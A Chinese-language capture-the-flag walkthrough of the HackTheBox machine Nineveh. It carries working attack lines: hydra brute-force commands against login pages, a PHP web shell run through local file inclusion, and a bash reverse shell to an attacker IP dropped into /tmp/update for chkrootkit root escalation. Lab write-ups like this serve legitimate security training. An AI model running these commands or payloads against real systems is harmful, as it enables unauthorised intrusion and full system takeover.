**
HackTheBox-Linux-Nineveh-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/54
靶机难度:中级(4.3/10)
靶机发布日期:2017年10月8日
靶机描述:
Nineveh is not overly challenging, however several exploits must be chained to gain initial access. Several uncommon services are running on the machine, and some research is required to enumerate them.
作者:大余
时间:2020-05-23
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.43…
namp仅发现开放了80和443端口,添加域名nineveh.htb到hosts…
访问web,未发现有用的信息…爆破
爆破发现/department目录…
访问department这是个用户登录页面…需要账号密码…先放着…目前没有账号密码信息登录…
访问开放的443…一张图,未发现有用的信息…
当时在站点发现了邮箱地址…先放着…
爆破发现了/db、/server-status、/secure_notes三个目录信息…
访问secure_notes发现又是一张图在主页上…
但是下载图片后,发现了有用的信息,改图片存放着RSA密匙凭证…应该很熟悉了,这是SSH登录需要的…
回看nmap未发现靶机开放了ssh服务…那就只有可能是靶机本地开启了ssh…只有获取低权shell外壳查看下…先放着这重要的信息…
继续访问/db目录,发下这是phpLiteAdmin的登录页面…
通过searchsploit phpliteadmin发现了几个漏洞…分析这些漏洞…
有版本匹配漏洞,有执行SQL注入的,还有的利用XSS和CSRF漏洞攻击的…
但是都需要成功登录…
目前获得的信息http的department存在登录页面和https的db存在登录页面…
当时都没有账号密码…这里也没找到任何有关账号密码的信息提示…直接暴力破解…
hydra -l admin -P 10k-most-common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
hydra -l admin -P dayupasswd 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -T 64
通过hydra的多种尝试…成功获得了https_db和http_department页面的账号密码信息…
二、提权
登录department页面,在notes处发现了很多有价值的信息…
URL处存在LFI攻击,以及提示了ninevehNotes.txt文件名称信息…
内容信息提示此页面连接着数据库…以及~amrois不知道做什么用的信息…
这里存在LFI攻击的话,又连接着数据库…思路应该是在数据库上传shell,在这里执行即可…试试
登录db页面后,根据前面收集信息查看到可利用的phpLite…的漏洞提示…开始创建shell…
命令:<?php echo system($_REQUEST["dayu"]);?>
命令:/var/tmp/ninevehNotes.php
根据漏洞利用提示,首先创建一个扩展名为的数据库,继续创建了ninevehNotes.php…(这里是因为前面获取的ninevehNotes.txt信息提示修改的…还因为测试了几遍就是无法获得shell…改了ninevehNotes名称后就可以了)
命令:http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&dayu=dir
通过简单的测试…成功利用shell注入查询信息…
直接利用一句话shell成功提www权限…
进来后直接印证本地开放了ssh服务…
通过反复思考前面获得的信息,LinEnum枚举,以及Find查看了amrois,发现存在amrois文件…
通过查看amrois文件信息…最后提示了要获得Amrois用户权限,需要敲震(knock)571 290 911端口…
继续find查看到了knock下存在的knock.conf…查看了配置,那就是在本地敲震端口后直接ssh利用RSA登陆即可…
sudo apt-get install knockd
knock 10.10.10.43 571 290 911
ssh -i id_ssh amrois@10.10.10.43
本地执行敲震,然后直接ssh成功获得了Amrois用户的权限…并获得了user_flag信息…
在主目录下发现report只在amrois权限下执行使用…查看发现了几个过去的文本文件…
随意查看了一个后…发现里面记录的都是过去执行过的文件过程信息…这里我需要查看用户执行的进程…
上传了pspy32对靶机的进程进行枚举…
可以看到很多chkrootkit,这是一个工具,它在检查主机是否存在rootkit的迹象…
chkrootkit存在漏洞…
本地进行查看…发现存在可利用漏洞…
Chkrootkit将以root身份运行任何名为/tmp/update的可执行文件,从而可以写入payload_shell…这就简单了直接写即可
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.51/6666 0>&1
通过简单的写入/tmp/update…然后赋予权限执行…成功获得了root权限…获得了root_flag信息…
目录爆破+hydra密码爆破+EXP漏洞利用+端口敲震+SSH_RSA+pspy枚举+chkrootkit 漏洞利用等等…
主要还是信息收集…信息收集越多,越容易拿下…
加油~~~
由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
扫一扫
632
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
